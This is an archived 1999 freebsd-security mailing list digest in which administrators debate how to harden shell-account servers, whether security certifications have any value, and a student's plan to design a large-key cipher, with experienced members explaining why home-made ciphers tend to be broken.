>| > hacker just hasn't named his root shell ircd... so monitor the sizes of
>| > new SUID programs
>|
>| Possibly putting my foot in my mouth here, but *why* would ircd need to be
>| SUID to anyone? It commonly runs at the high ports (6667) and thus does
>| not need root for that.
>|
>| If you want a specific ircd user to run ircd (either by script or by
>| respawning from init), I don't see a need for the ircd binary to be SUID
>| to anyone (executable only by that user yes, SUID no)
>|
>| Or am I missing something here?
>
>It's normally suid because the conf files are readable only by the
>'owner' -- it's also suid to limit the damage you can do, normally
>you setup an 'irc' account and make it suid that.

I'm going to look at phk's jail stuff soon in application for a shell server,
but right now, the king shell server I ran has /usr/home, /tmp (which is also
/var/tmp) mounted noexec, nosuid, nosgid.

The worst thing in the world you can ever do is allow users to compile/run
their own binaries. If a user wants something installed, then I'll damn well
compile it and install it for *all* to use.
Adrian

From owner-freebsd-security Tue Jun 1 23:54:58 1999
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 662181522D; Tue, 1 Jun 1999 23:54:52 -0700 (PDT) (envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id IAA24213; Wed, 2 Jun 1999 08:54:36 +0200 (CEST) (envelope-from phk@critter.freebsd.dk)
To: adrian@FreeBSD.ORG
Cc: Andrew Kenneth Milton, freebsd-security@FreeBSD.ORG
Subject: Re: Shell Account system
In-reply-to: Your message of "Wed, 02 Jun 1999 13:47:23 +0800." <19990602054724.12309.qmail@ewok.creative.net.au>
Date: Wed, 02 Jun 1999 08:54:36 +0200
Message-ID: <24211.928306476@critter.freebsd.dk>
From: Poul-Henning Kamp
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <19990602054724.12309.qmail@ewok.creative.net.au>, adrian@FreeBSD.OR
>The worst thing in the world you can ever do is allow users to compile/run
>their own binaries. If a user wants something installed, then I'll damn
>well compile it and install it for *all* to use.

Go into the kernel, modify it so only suser() can set an execute bit.

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Wed Jun 2 01:18:45 1999
Delivered-To: freebsd-security@freebsd.org
Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 557F314E46 for ; Wed, 2 Jun 1999 01:18:36 -0700 (PDT) (envelope-from ark@eltex.ru)
Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id MAA15600; Wed, 2 Jun 1999 12:18:37 +0400 (MSD)
Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Wed, 2 Jun 1999 12:17:46 +0400
Received: from undisclosed-intranet-sender id xma013304; Wed, 2 Jun 99 12:17:33 +0400
Date: Wed, 2 Jun 1999 12:17:21 +0400
Message-Id: <199906020817.MAA31586@paranoid.eltex.spb.ru>
In-Reply-To: <4.1.19990601232241.0093e100@127.0.0.1> from "Ron Pritchett "
From: ark@eltex.ru
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: Security Certification for individuals
To: pritchet@bigfoot.com
Cc: freebsd-security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

nuqneH,

Tekmetrics has announced it. I'd better not trust ICSA.
IMHO security certification is all bullshit (in RL) but it is going to be
free with Tekmetrics at least.
I'd better say to fsck off to potential employer if he asks me if i have
ICSA certification ;)

Ron Pritchett said :

> I was wondering if any of the security organizations (CERT, ICSA, etc.) offer
> certification for individuals... I was thinking along the lines of Sun and
> Cisco's programs.....
>
> thanks!

                               _     _  _  _  _      _  _  _  _  _  _  _
 {::}  {::}  {::}  CU in Hell  _| o |_ | | _|| |  / _||_| |_ |_ |_
 (##)  (##)  (##)  /Arkan#iD   |_ o _||_| _||_| / _|  | o |_||_||_|
 [||]  [||]  [||]  Do i believe in Bible? Hell,man,i've seen one!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBN1Toj6H/mIJW9LeBAQG6bQP/ewnmE6Gx7BE1UOTB2iKuWnJzpe4kiW+J
qTCudHxKkXw8xVB445TBet6GlRgpXjqtBR0oHc+anr1Ew+b2Wv1daeNaPjK5x38K
0Ew9zo2rZvRfbEIWm5ffERT9sGlrFmPvC35/uzfBAXHUbp5T2/YPaUDkXWvsibpD
dWWQ8BL3rfg=
=cILZ
-----END PGP SIGNATURE-----

From owner-freebsd-security Wed Jun 2 01:43:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from sentry.isrc.qut.edu.au (sentry.isrc.qut.edu.au [131.181.97.10]) by hub.freebsd.org (Postfix) with SMTP id AF77915893 for ; Wed, 2 Jun 1999 01:43:49 -0700 (PDT) (envelope-from gaskell@isrc.qut.edu.au)
Received: (qmail 22277 invoked from network); 2 Jun 1999 08:43:48 -0000
Received: from primrose.isrc.qut.edu.au (@131.181.6.10) by secure.isrc.qut.edu.au with SMTP; 2 Jun 1999 08:43:48 -0000
Received: from primrose.isrc.qut.edu.au (primrose.isrc.qut.edu.au [131.181.6.10]) by
	primrose.isrc.qut.edu.au (8.8.8+Sun/8.8.0/brad) with ESMTP id SAA00507; Wed, 2 Jun 1999 18:43:47 +1000 (EST)
Date: Wed, 2 Jun 1999 18:43:47 +1000 (EST)
From: Gary Gaskell
To: ark@eltex.ru
Cc: pritchet@bigfoot.com, freebsd-security@FreeBSD.ORG
Subject: Re: Security Certification for individuals
In-Reply-To: <199906020817.MAA31586@paranoid.eltex.spb.ru>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Agreed. I've seen some sharks that claim that they've been certified by
their firewall vendor. One even claimed he was certified to train people
in a particular firewall product, and this man let through all UDP and
could not figure out how to allow return traffic without letting in SYN
packets for high ports! Hence I see vendor certification as a load of
rubbish, possibly save that of Cisco.

Gary

On Wed, 2 Jun 1999 ark@eltex.ru wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> nuqneH,
>
> Tekmetrics has announced it. I'd better not trust ICSA.
> IMHO security certification is all bullshit (in RL) but it is going to be
> free with Tekmetrics at least.
> I'd better say to fsck off to potential employer if he asks me if i have
> ICSA certification ;)
>
> Ron Pritchett said :
>
> > I was wondering if any of the security organizations (CERT, ICSA, etc.) offer
> > certification for individuals... I was thinking along the lines of Sun and
> > Cisco's programs.....
> >
> > thanks!
>
>                                _     _  _  _  _      _  _  _  _  _  _  _
>  {::}  {::}  {::}  CU in Hell  _| o |_ | | _|| |  / _||_| |_ |_ |_
>  (##)  (##)  (##)  /Arkan#iD   |_ o _||_| _||_| / _|  | o |_||_||_|
>  [||]  [||]  [||]  Do i believe in Bible? Hell,man,i've seen one!
>
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3i
> Charset: noconv
>
> iQCVAwUBN1Toj6H/mIJW9LeBAQG6bQP/ewnmE6Gx7BE1UOTB2iKuWnJzpe4kiW+J
> qTCudHxKkXw8xVB445TBet6GlRgpXjqtBR0oHc+anr1Ew+b2Wv1daeNaPjK5x38K
> 0Ew9zo2rZvRfbEIWm5ffERT9sGlrFmPvC35/uzfBAXHUbp5T2/YPaUDkXWvsibpD
> dWWQ8BL3rfg=
> =cILZ
> -----END PGP SIGNATURE-----

Cheers,
Gary

-----------------------------------------------------------
Gary Gaskell                  Manager Secure Network Laboratory
Phone (07) 3864 1190          Information Security Research Centre
Fax (07) 3221 2384            Queensland University of Technology
-----------------------------------------------------------
  _--_|\    /  QUT A University for    http://www.qut.edu.au/
 _.--._/     the Real World.
       v

From owner-freebsd-security Wed Jun 2 04:03:26 1999
Delivered-To: freebsd-security@freebsd.org
Received: from easeway.com (ns1.easeway.com [209.69.39.1]) by hub.freebsd.org (Postfix) with ESMTP id 0F27314D0F for ; Wed, 2 Jun 1999 04:03:23 -0700 (PDT) (envelope-from mwlucas@easeway.com)
Received: (from mwlucas@localhost) by easeway.com (8.8.8/8.8.5) id GAA05703 for security@freebsd.org; Wed, 2 Jun 1999 06:54:27 -0400 (EDT)
Message-Id: <199906021054.GAA05703@easeway.com>
Subject: Re: Security Certification for individuals
In-Reply-To: from Gary Gaskell at "Jun 2, 99 06:43:47 pm"
To: security@freebsd.org
Date: Wed, 2 Jun 1999 06:54:27 -0400 (EDT)
From: mwlucas@exceptionet.com
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Oh, vendor "security" training has its uses. You learn how to operate that
one product. If the product has a poorly-designed interface, or is full of
hideous quirks (i.e., Checkpoint on NT), that's invaluable.

But it has nothing to do with security.

When people use vendor certification as their main selling point, it's time
to run.

==ml

> Agreed. I've seen some sharks that claim that they've been certified by
> their firewall vendor. One even claimed he was certified to train people
> in a particular firewall product, and this man let through all UDP and
> could not figure out how to allow return traffic without letting in SYN
> packets for high ports! hence I see vendor certification as a load of
> rubbish, possibly save that of Cisco.
>
> Gary
>

--
Michael Lucas               | Exceptionet, Inc.   | www.exceptionet.com
"Exceptional Networking"    |

From owner-freebsd-security Wed Jun 2 07:21:05 1999
Delivered-To: freebsd-security@freebsd.org
Received: from federation.addy.com (federation.addy.com [207.239.68.2]) by hub.freebsd.org (Postfix) with ESMTP id D278014D04 for ; Wed, 2 Jun 1999 07:20:58 -0700 (PDT) (envelope-from jim@federation.addy.com)
Received: from localhost (jim@localhost) by federation.addy.com (8.8.5/8.6.12) with SMTP id KAA20796 for ; Wed, 2 Jun 1999 10:20:57 -0400 (EDT)
Date: Wed, 2 Jun 1999 10:20:56 -0400 (EDT)
From: Jim Sander
Reply-To: Jim Sander
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Shell Account system
In-Reply-To: <19990602054724.12309.qmail@ewok.creative.net.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> The worst thing in the world you can ever do is allow users to compile/run
> their own binaries. If a user wants something installed, then I'll damn
> well compile it and install it for *all* to use.

   Um, I'd have to disagree there. Assuming you're talking about non-root
level users of course.

   The big problem is of course scaling. If you have 10 users, it's easy.
When you have 1000, spread out over a dozen servers, it becomes challenging
to administer. Everyone wants something different, and it's usually
incompatible with what someone else wants. It takes time and effort that
could be better spent securing your system in other ways. Then try
upgrading anything and you'll be screwed even worse!

   If they're compiling as a "normal" user, they should/are restricted from
potentially dangerous operations. Nothing is perfect, but if you're that
paranoid you should not have any users on the system at all. Plus, there's
almost nothing you can do with a compiler that can't also be done with Perl
anyway. (surely you let users have Perl!)

   The name of the game of course is to be better, faster, and more
attentive to detail than anyone on your systems who would seek to do
something they shouldn't. You can't do that if you're installing strange
things for one user or doing updates every time a bug is found.

   Just my opinion of course...
-=Jim=-

From owner-freebsd-security Wed Jun 2 09:39:40 1999
Delivered-To: freebsd-security@freebsd.org
Received: from freed.ddns.org (derby.JSP.UMontreal.CA [132.204.45.26]) by hub.freebsd.org (Postfix) with ESMTP id 576BE15974 for ; Wed, 2 Jun 1999 09:39:29 -0700 (PDT) (envelope-from spidey@jsp.umontreal.ca)
Received: from localhost (spidey@localhost) by freed.ddns.org (8.9.3/8.9.3) with ESMTP id MAA00809; Wed, 2 Jun 1999 12:39:02 -0400 (EDT) (envelope-from spidey@jsp.umontreal.ca)
X-Authentication-Warning: freed.ddns.org: spidey owned process doing -bs
Date: Wed, 2 Jun 1999 12:39:01 -0400 (EDT)
From: Spidey
X-Sender: spidey@freed.ddns.org
Reply-To: Spidey
To: Unknow User
Cc: Kris Kennaway, security@FreeBSD.ORG
Subject: Re: Shell Account system
In-Reply-To: <37534264.6D29110A@tdnet.com.br.>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8BIT
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

May I add that you would surely like to read the security(7) man page. It
is quite a great primer.

ciao.

ants.

On Mon, 31 May 1999, Unknow User wrote:

> Yeah, thanks, but the system is for anyone able to pay, so, you can say
> i trust nobody.
>
> Kris Kennaway wrote:
> >
> > On Mon, 31 May 1999, Joe Gleason wrote:
> >
> > [Snip]
> >
> > Good advice, but running a shell account for people who you don't really trust
> > is still not a wise move for the inexperienced, and not something you can
> > easily document in a webpage. UNIX security is a way of life - there are any
> > number of things which the unwary can trip over which could potentially
> > compromise your machine.
> >
> > If it's for a small group of users who you trust fairly well, you
> > probably should be okay, though.
>

A born educator takes nothing seriously except in relation to his disciples
-- himself not excepted.
	-Nietzsche, "Par delà le bien et le mal" (Beyond Good and Evil)

From owner-freebsd-security Wed Jun 2 10:50:19 1999
Delivered-To: freebsd-security@freebsd.org
Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 8D1EF15108 for ; Wed, 2 Jun 1999 10:50:13 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id KAA11243; Wed, 2 Jun 1999 10:49:35 -0700 (PDT)
Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id KAA01200; Wed, 2 Jun 1999 10:49:34 -0700
Received: from softweyr.com (dyn2.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA16650; Wed, 2 Jun 99 10:49:31 PDT
Message-Id: <37556EAB.6101B755@softweyr.com>
Date: Wed, 02 Jun 1999 11:49:31 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
Mime-Version: 1.0
To: ark@eltex.ru
Cc: pritchet@bigfoot.com, freebsd-security@FreeBSD.ORG
Subject: Re: Security Certification for individuals
References: <199906020817.MAA31586@paranoid.eltex.spb.ru>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

ark@eltex.ru wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> nuqneH,
>
> Tekmetrics has announced it. I'd better not trust ICSA.
> IMHO security certification is all bullshit (in RL) but it is going to be
> free with Tekmetrics at least.
> I'd better say to fsck off to potential employer if he asks me if i have
> ICSA certification ;)

I just poked around the Tekmetrics web site, and it looks pretty good.
If anyone is interested in creating FreeBSD certifications, as a
programmer, system administrator, or security administrator, working
with Tekmetrics to make FreeBSD-specific versions of their generic
UNIX exams would be a good starting point.

http://www.tekmetrics.com/ (duh!)

Try out the Dilbert "fun exam" for a sample of what their test
procedures look like.

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                Softweyr LLC
http://www.softweyr.com/~softweyr                    wes@softweyr.com

From owner-freebsd-security Wed Jun 2 17:49:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from konichiwa.cc.columbia.edu (konichiwa.cc.columbia.edu [128.59.59.132]) by hub.freebsd.org (Postfix) with ESMTP id 6436314EF8 for ; Wed, 2 Jun 1999 17:48:55 -0700 (PDT) (envelope-from stuyman@confusion.net)
Received: from confusion.net (dialup-11-9.cc.columbia.edu [128.59.36.245]) by konichiwa.cc.columbia.edu (8.8.5/8.8.5) with ESMTP id UAA06601 for ; Wed, 2 Jun 1999 20:48:50 -0400 (EDT)
Message-ID: <3755D0E4.55677E6@confusion.net>
Date: Wed, 02 Jun 1999 20:48:36 -0400
From: Laurence Berland
Organization: B.R.A.T.T.
X-Mailer: Mozilla 4.5 [en] (Win95; U)
X-Accept-Language: en
MIME-Version: 1.0
To: security@freebsd.org
Subject: Not freebsd related...yet
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm writing a new encryption algorithm for my computer science final
project. Although it doesn't need to be particularly great I'm thinking
there's no reason it's gotta be bad. I'm building a symmetric algorithm
that is designed to specifically handle large keys, i.e. >1024 bytes. If
anyone has any hints or suggestions, I'm open to them...in fact that's
why I'm writing this in the first place. If it works well, maybe
someday people will actually use it, then again maybe not. thanks for
your time.

--
Laurence Berland, Stuyvesant HS Debate
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
Windows 98: n. useless extension to a minor patch release for 32-bit
extensions and a graphical shell for a 16-bit patch to an 8-bit
operating system originally coded for a 4-bit microprocessor, written
by a 2-bit company that can't stand for 1 bit of competition.
http://stuy.debate.net
icq #7434346  aol imer E1101
The above email Copyright (C) 1999 Laurence Berland
All rights reserved

From owner-freebsd-security Wed Jun 2 18:38:29 1999
Delivered-To: freebsd-security@freebsd.org
Received: from valis.worldgate.com (valis.worldgate.com [198.161.84.2]) by hub.freebsd.org (Postfix) with ESMTP id 8536A14E5D for ; Wed, 2 Jun 1999 18:38:21 -0700 (PDT) (envelope-from skafte@gras-varg.worldgate.com)
Received: from gras-varg.worldgate.com (skafte@gras-varg.worldgate.com [198.161.84.12]) by valis.worldgate.com (8.9.1a/8.9.1) with ESMTP id SAA11869 for ; Wed, 2 Jun 1999 18:55:26 -0600 (MDT)
Received: (from skafte@localhost) by gras-varg.worldgate.com (8.9.1a/8.9.1) id SAA25553 for freebsd-security@freebsd.org; Wed, 2 Jun 1999 18:55:25 -0600 (MDT)
Date: Wed, 2 Jun 1999 18:55:24 -0600
From: Greg Skafte
To: freebsd-security@freebsd.org
Subject: Has anyone looked at
Message-ID: <19990602185524.D24872@gras-varg.worldgate.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
Organization: WorldGate Inc.
X-PGP-Fingerprint: 42 9C 2C A8 4D 2B C9 C4 7D B6 00 B0 50 47 20 97
X-URL: http://gras-varg.worldgate.com/~skafte
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Rule Set Based Access Control (RSBAC) - Homepage
URL: http://www.compuniverse.com/rsbac/

It's a set of patches for Linux but there are some interesting papers and
such listed. Maybe some ideas for the FreeBSD-harden project.

--
Email: skafte@worldgate.com   Voice: +780 413 1910   Fax: +780 421 4929
#575 Sun Life Place * 10123 99 Street * Edmonton, AB * Canada * T5J 3H1
--
--
When things can't get any worse, they simplify themselves by getting a
whole lot worse then complicated. A complete and utter disaster is the
simplest thing in the world; it's preventing one that's complex.
(Janet Morris)

From owner-freebsd-security Wed Jun 2 22:10:06 1999
Delivered-To: freebsd-security@freebsd.org
Received: from tas5-atm.tampabay.rr.com (tas5-atm.tampabay.rr.com [24.92.0.55]) by hub.freebsd.org (Postfix) with ESMTP id C7EC714F0C for ; Wed, 2 Jun 1999 22:10:01 -0700 (PDT) (envelope-from bmyers1@tampabay.rr.com)
Received: from k6400 ([24.92.13.191]) by tas5-atm.tampabay.rr.com (8.8.8+Sun/8.8.8+RoadRunner) with SMTP id BAA15983; Thu, 3 Jun 1999 01:07:36 -0400 (EDT)
Message-ID: <004d01bead62$71406b40$bf0d5c18@tampabay.rr.com>
From: "Bob Myers"
To: "Wes Peters"
Cc:
References: <199906020817.MAA31586@paranoid.eltex.spb.ru> <37556EAB.6101B755@softweyr.com>
Subject: Re: Security Certification for individuals
Date: Wed, 2 Jun 1999 21:42:42 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Just FYI, the Tekmetrics tests for C and/or C++ are generally regarded as
useless, or, even worse, just plain wrong. There was a full discussion of
this issue in some of the C/C++ newsgroups a while back that you may want
to review.

----- Original Message -----
From: Wes Peters
To:
Cc: ;
Sent: Wednesday, June 02, 1999 1:49 PM
Subject: Re: Security Certification for individuals

> ark@eltex.ru wrote:
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> >
> > nuqneH,
> >
> > Tekmetrics has announced it. I'd better not trust ICSA.
> > IMHO security certification is all bullshit (in RL) but it is going to be
> > free with Tekmetrics at least.
> > I'd better say to fsck off to potential employer if he asks me if i have
> > ICSA certification ;)
>
> I just poked around the Tekmetrics web site, and it looks pretty good.
> If anyone is interested in creating FreeBSD certifications, as a
> programmer, system administrator, or security administrator, working
> with Tekmetrics to make FreeBSD-specific versions of their generic
> UNIX exams would be a good starting point.
>
> http://www.tekmetrics.com/ (duh!)
>
> Try out the Dilbert "fun exam" for a sample of what their test
> procedures look like.
>
> --
> "Where am I, and what am I doing in this handbasket?"
>
> Wes Peters                                                Softweyr LLC
> http://www.softweyr.com/~softweyr                    wes@softweyr.com

From owner-freebsd-security Thu Jun 3 01:46:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id BBE68150D3 for ; Thu, 3 Jun 1999 01:46:13 -0700 (PDT) (envelope-from jeroen@vangelderen.org)
Received: from wit395301.student.utwente.nl ([130.89.235.121]:25094 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8052-12447>; Thu, 3 Jun 1999 10:45:57 +0200
Message-ID: <375640B1.B901E581@vangelderen.org>
Date: Thu, 03 Jun 1999 10:45:37 +0200
From: "Jeroen C. van Gelderen"
X-Mailer: Mozilla 4.51 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Laurence Berland
Cc: security@FreeBSD.ORG
Subject: Re: Not freebsd related...yet
References: <3755D0E4.55677E6@confusion.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Laurence Berland wrote:
> I'm writing a new encryption algorithm for my computer science
> final project. Although it doesn't need to be particularly great
> I'm thinking there's no reason it's gotta be bad.

No offense, but the fact that you think this sort of implies that it
*will* be bad. Is there any reason for you to invent another (probably
insecure) algorithm instead of picking one from the collection of
existing, secure ciphers?

> I'm building a symmetric algorithm that is designed to
> specifically handle large keys, i.e. >1024 bytes.

Any reason as to why you accept such long keys? The DES successor (AES)
will take 256 bits maximum and the cryptographic community considers
this sufficient.

> If anyone has any hints or suggestions, I'm open to them...in
> fact that's why I'm writing this in the first place. If it
> works well, maybe someday people will actually use it, then
> again maybe not. thanks for your time.

For starters, read Bruce Schneier's "Applied Cryptography", 2nd Edition.
Read it completely. Read "Cryptography, Theory and Practice" by Douglas
Stinson and the "Handbook of Applied Cryptography" by Menezes et al.
Have a look at the appropriate newsgroups and pay attention to what
happens to new algorithms.

Cheers,
Jeroen
--
Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE

From owner-freebsd-security Thu Jun 3 02:17:34 1999
Delivered-To: freebsd-security@freebsd.org
Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 5D7FE151B1 for ; Thu, 3 Jun 1999 02:17:22 -0700 (PDT) (envelope-from ark@eltex.ru)
Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id NAA22141; Thu, 3 Jun 1999 13:17:05 +0400 (MSD)
Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Thu, 3 Jun 1999 13:16:11 +0400
Received: from undisclosed-intranet-sender id xma016192; Thu, 3 Jun 99 13:16:00 +0400
Date: Thu, 3 Jun 1999 13:15:47 +0400
Message-Id: <199906030915.NAA04908@paranoid.eltex.spb.ru>
In-Reply-To: <004d01bead62$71406b40$bf0d5c18@tampabay.rr.com> from ""Bob Myers" "
From: ark@eltex.ru
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: Security Certification for individuals
To: bmyers1@tampabay.rr.com
Cc: , wes@softweyr.com
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

nuqneH,

"Bob Myers" said :
> Just FYI, the Tekmetrics tests for C and/or C++ are generally
> regarded as useless, or, even worse, just plain wrong. There
> was a full discussion of this issue in some of the C/C++
> newsgroups a while back that you may want to review.

Do you know a test/exam that is not? Microsoft? Checkpoint? Even Novell?
No. Maybe CISCO but I have not seen it.

_ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD
|_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do I believe in Bible? Hell, man, I've seen one!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBN1ZHwqH/mIJW9LeBAQG+GgP/QPxfo4ZrwCON6xqAnsLDrr/jfjVr3vX6
nEDmDbbGu1u+pFJcZLgAzyA1OV3obaLZex7OUfftviRefSZV1gKK6e7Mo44zVruS
7IetPpcFm8wTtrXwlMzT1O5mn2kIkZfe1Enc6TuL4xmdDVEdi62Zg3sWmXJjQBoI
TiQeOKCmY0s=
=/442
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu Jun 3 5:37: 4 1999
Delivered-To: freebsd-security@freebsd.org
Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id 4843B14FD1 for ; Thu, 3 Jun 1999 05:36:55 -0700 (PDT) (envelope-from adam@weathership.homeport.org)
Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id IAA24977; Thu, 3 Jun 1999 08:56:44 -0400 (EDT)
Date: Thu, 3 Jun 1999 08:56:44 -0400
From: Adam Shostack
To: Laurence Berland
Cc: security@FreeBSD.ORG
Subject: Re: Not freebsd related...yet
Message-ID: <19990603085644.A24954@weathership.homeport.org>
References: <3755D0E4.55677E6@confusion.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.3i
In-Reply-To: <3755D0E4.55677E6@confusion.net>; from Laurence Berland on Wed, Jun 02, 1999 at 08:48:36PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Jun 02, 1999 at 08:48:36PM -0400, Laurence Berland wrote:
| I'm writing a new encryption algorithm for my computer science final
| project. Although it doesn't need to be particularly great I'm thinking
| there's no reason it's gotta be bad. I'm building a symmetric algorithm
| that is designed to specifically handle large keys ie >1024 bytes. If
| anyone has any hints or suggestions, I'm open to them...in fact that's
| why I'm writing this in the first place. If it works well, maybe
| someday people will actually use it, then again maybe not. thanks for
| your time.

Actually, this will be 1. broken, and 2. uninteresting. I'd be happy
to bet money if it wasn't a sucker bet.

1. Building a cipher with a large key is hard. See the first Twofish
paper, where Schneier et al. discuss the difficulty of building a key
schedule to effectively use long keys. Getting 1024 BYTES of
randomness is next to impossible, so your implementors will end up
expanding a smaller pool of randomness into a large key. Given that
this is unavoidable, you should anticipate it in your design, and have
a key expansion phase. That you didn't know this is worrisome.

2. Building a system to use more resources than current systems, and
expecting resource consumption to make it interesting is silly.

If you want an interesting project, may I suggest trying to
cryptanalyze one of the AES candidates? It's more interesting, will
teach you a bunch, and may produce something useful.

Sorry to flame, but this really isn't a good use of your time.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From owner-freebsd-security Thu Jun 3 7:14:54 1999
Delivered-To: freebsd-security@freebsd.org
Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 8FE3415256 for ; Thu, 3 Jun 1999 07:14:51 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee)
Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id RAA20251; Thu, 3 Jun 1999 17:14:36 +0300 (EEST)
Date: Thu, 3 Jun 1999 17:14:35 +0300 (EEST)
From: Narvi
To: Adam Shostack
Cc: Laurence Berland , security@FreeBSD.ORG
Subject: Re: Not freebsd related...yet
In-Reply-To: <19990603085644.A24954@weathership.homeport.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 3 Jun 1999, Adam Shostack wrote:

>
> Actually, this will be 1. broken, and 2. uninteresting. I'd be happy
> to bet money if it wasn't a sucker bet.
>
> 1. Building a cipher with a large key is hard. See the first Twofish
> paper, where Schneier et al. discuss the difficulty of building a key
> schedule to effectively use long keys. Getting 1024 BYTES of
> randomness is next to impossible, so your implementors will end up
> expanding a smaller pool of randomness into a large key. Given that
> this is unavoidable, you should anticipate it in your design, and have
> a key expansion phase. That you didn't know this is worrisome.
>

Let's leave aside what he knows and what he doesn't.

